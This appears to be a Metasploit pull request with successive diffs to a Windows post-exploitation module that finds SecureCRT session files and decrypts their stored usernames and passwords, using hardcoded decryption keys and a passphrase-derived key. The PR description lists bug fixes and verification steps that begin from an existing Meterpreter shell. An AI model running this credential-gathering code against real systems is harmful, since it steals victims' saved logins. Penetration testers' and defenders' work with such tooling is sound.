### PR TITLE
Fix NIL Dereference Issues, Missing fail_with Statements, and Update Regex Inside SecureCRT Password Gatherer

### DIFF
--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Post
       hostname = Regexp.compile('S:"Hostname"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
       decrypted_script = Regexp.compile('S:"Login Script V3"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
       if !decrypted_script.nil?
-        username = decrypted_script.match(/login(?: name)?:\x1F(\S+)\x1F(?:[\d])\x1Fpass/u) ? Regexp.last_match(1) : nil
-        password = decrypted_script.match(/password:\x1F([\S]+)\x1F/u) ? Regexp.last_match(1) : nil
-        domain = decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u) ? Regexp.last_match(1) : nil
+        username = decrypted_script[/login(?: name)?:\x1F(?<login>\S+)\x1F(?:[\d])\x1Fpass/u, 'login']
+        password = decrypted_script[/password:\x1F(?<password>[\S]+)\x1F/u, 'password']
+        domain = decrypted_script[/Windows Domain:\x1F(?<domain>[\S]+)\x1F/u, 'domain']
         if !domain.nil? && !username.nil?
           username = domain + '\\' + username
         end

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Post
     begin
       print_status("Searching for session files in #{path}")
       config_ini += session.fs.file.search(path, '*.ini')
-      fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.to_s.empty?
+      fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
     rescue Rex::Post::Meterpreter::RequestError
       fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
     end

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -62,8 +62,13 @@ class MetasploitModule < Msf::Post
   def enum_session_file(path)
     config_ini = []
     tbl = []
-    print_status("Searching for session files in #{path}")
-    config_ini += session.fs.file.search(path, '*.ini')
+    begin
+      print_status("Searching for session files in #{path}")
+      config_ini += session.fs.file.search(path, '*.ini')
+      fail_with(Msf::Module::BadConfig, "Could not find any session files at #{securecrt_path}") if config_ini == []
+    rescue Rex::Post::Meterpreter::RequestError
+      fail_with(Msf::Module::BadConfig, "Could not access the directory at #{securecrt_path} or it doesn't exist")
+    end
 
     # enum session file
     config_ini.each do |item|
@@ -77,11 +82,14 @@ class MetasploitModule < Msf::Post
       protocol = Regexp.compile('S:"Protocol Name"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
       hostname = Regexp.compile('S:"Hostname"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
       decrypted_script = Regexp.compile('S:"Login Script V3"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+      p decrypted_script
       if !decrypted_script.nil?
-        username = decrypted_script.match(/login name:\x1F(\S+)\x1F0\x1Fpass/u)[1]
-        password = decrypted_script.match(/password:\x1F([\S]+)\x1F0/u)[1]
-        domain = decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u) ? decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u)[1] : nil
-        if !domain.nil?
+        username = decrypted_script.match(/login(?: name)?:\x1F(\S+)\x1F(?:[\d])\x1Fpass/u) ? Regexp.last_match(1) : nil
+        p username
+        password = decrypted_script.match(/password:\x1F([\S]+)\x1F/u) ? Regexp.last_match(1) : nil
+        p password
+        domain = decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u) ? Regexp.last_match(1) : nil
+        if !domain.nil? && !username.nil?
           username = domain + '\\' + username
         end
       else
@@ -182,7 +190,7 @@ class MetasploitModule < Msf::Post
     end
 
     if securecrt_path.to_s.empty?
-      print_error('Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
+      fail_with(Msf::Module::NotFound, 'Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
     else
       result = enum_session_file(securecrt_path)
       columns = [

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -78,25 +78,26 @@ class MetasploitModule < Msf::Post
         next
       end
 
-      file = try_encode_file(file_contents)
-      protocol = Regexp.compile('S:"Protocol Name"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
-      hostname = Regexp.compile('S:"Hostname"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
-      decrypted_script = Regexp.compile('S:"Login Script V3"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+      file = try_encode_file(file_contents).force_encoding(Encoding::UTF_8)
+      protocol = file[/"Protocol Name"=(?<protocol>[^\s]+)/u, 'protocol']
+      hostname = file[/"Hostname"=(?<hostname>[^\s]+)/u, 'hostname']
+      decrypted_script = securecrt_crypto_v2(file[/"Login Script V3"=02:(?<script>[0-9a-f]+)/u, 'script'])
       if !decrypted_script.nil?
-        username = decrypted_script[/login(?: name)?:\x1F(?<login>\S+)\x1F(?:[\d])\x1Fpass/u, 'login']
-        password = decrypted_script[/password:\x1F(?<password>[\S]+)\x1F/u, 'password']
-        domain = decrypted_script[/Windows Domain:\x1F(?<domain>[\S]+)\x1F/u, 'domain']
+        username = decrypted_script[/[l]*ogin(?: name)?:\x1F(?<login>\S+)\x1F(?:[\d])\x1F[p]*ass/u, 'login']
+        password = decrypted_script[/[p]*assword:\x1F(?<password>[\S]+)\x1F/u, 'password']
+        domain = decrypted_script[/[Ww]*indows [Dd]*omain:\x1F(?<domain>[\S]+)\x1F/u, 'domain']
         if !domain.nil? && !username.nil?
           username = domain + '\\' + username
         end
       else
-        password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
-        passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
-        username = Regexp.compile('S:"Username"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
+        password = securecrt_crypto(file[/"Password"=u(?<password>[0-9a-f]+)/u, 'password'])
+        passwordv2 = securecrt_crypto_v2(file[/"Password V2"=02:(?<passwordv2>[0-9a-f]+)/, 'passwordv2'])
+        username = file[/"Username"=(?<username>[^\s]+)/, 'username']
       end
 
-      port = Regexp.compile("D:\"\\\[#{protocol}\\\] Port\"=([0-9a-f]{8})").match(file) ? Regexp.last_match(1).to_i(16).to_s : nil
-      port = Regexp.compile('D:"Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil if !port
+      port = file[/#{protocol}\r\n\w:\"Port\"=(?<port>[0-9a-f]{8})/, 'port']&.to_i(16)&.to_s
+      port = file[/\[#{protocol}\] Port\"=(?<port>[0-9a-f]{8})/, 'port']&.to_i(16)&.to_s if port.nil?
+
 
       tbl << {
         file_name: item['name'],
@@ -111,6 +112,7 @@ class MetasploitModule < Msf::Post
   end
 
   def securecrt_crypto(ciphertext)
+    return nil if ciphertext.nil? || ciphertext.empty?
     key1 = "\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07"
     key2 = "\x5F\xB0\x45\xA2\x94\x17\xD9\x16\xC6\xC6\xA2\xFF\x06\x41\x82\xB7"
     ciphered_bytes = [ciphertext].pack('H*')
@@ -126,6 +128,7 @@ class MetasploitModule < Msf::Post
   end
 
   def securecrt_crypto_v2(ciphertext)
+    return nil if ciphertext.nil? || ciphertext.empty?
     iv = ("\x00" * 16)
     config_passphrase = datastore['PASSPHRASE'] || nil
     key = OpenSSL::Digest::SHA256.new(config_passphrase).digest

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Post
     begin
       print_status("Searching for session files in #{path}")
       config_ini += session.fs.file.search(path, '*.ini')
-      fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini == []
+      fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.to_s.empty?
     rescue Rex::Post::Meterpreter::RequestError
       fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
     end


### PR DESCRIPTION
So after doing a bit of testing on the SecureCRT password enumeration module I discovered that I had overlooked a bug that was noted at https://github.com/rapid7/metasploit-framework/pull/14326#issuecomment-720613101 whereby if SecureCRT is installed with a password and the password field was blank, we could get an error. 

Closer inspection revealed this was due not only to a set of calls to `.match()` that were implicitly trusted not to return `nil` (even though in reality they could very easily return `nil`), but also cause the regex doesn't work on the latest version of SecureCRT (8.7.3 build 2279). 

Additionally we also had some cases where we should have been calling fail_with to raise appropriate errors and bail but we weren't which could have lead to some confusion.

This module does a few things to ensure things go a bit smoother now:

1. Applies updates to the regex to hopefully work on both new and old versions of SecureCRT. This needs to be tested further to ensure I haven't broken anything.
1. Updates the code to fix the cases where `.match()` results were being used without first checking if they were `nil`.
1. Updates the code to add in some `fail_with` calls where there are potential cases that the code should bail at.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Gain a Meterpreter shell on a target system running the latest version of SecureCRT on Windows 10 x64.
- [ ] `use post/windows/gather/credentials/securecrt`
- [ ] `set SESSION <session id>`
- [ ] **Verify** the module works correctly and warns if there is a password set for SecureCRT upon installation that has not been supplied or which is not correct.
- [ ] `set PASSPHRASE <installation passphrase>`
- [ ] **Verify** that even with a blank username and password, you don't get a stack trace anymore.
- [ ] **Verify** that you are still able to dump usernames and passwords successfully, even if there is an installation password set for SecureCRT.
- [ ] **Verify** that if you set the `Config Path` value of the `HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT` registry key to an valid path with no files within it that the message `Cannot find any session files at` appears in the output.
- [ ] **Verify** that if you set the `Config Path` value of the `HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT` registry key to an invalid path or one that the user cannot access that the message `[-] Post aborted due to failure: bad-config: The SecureCRT registry key on the target is likely misconfigured. The directory at <directory> is inaccessable or doesn't exist` appears in the output.
- [ ] **Verify** that if SecureCRT is uninstalled a `Failure::NotFound` error is raised stating that the registry entry for the SecureCRT session path was not found and therefore the user should ensure that SecureCRT is installed on the target.
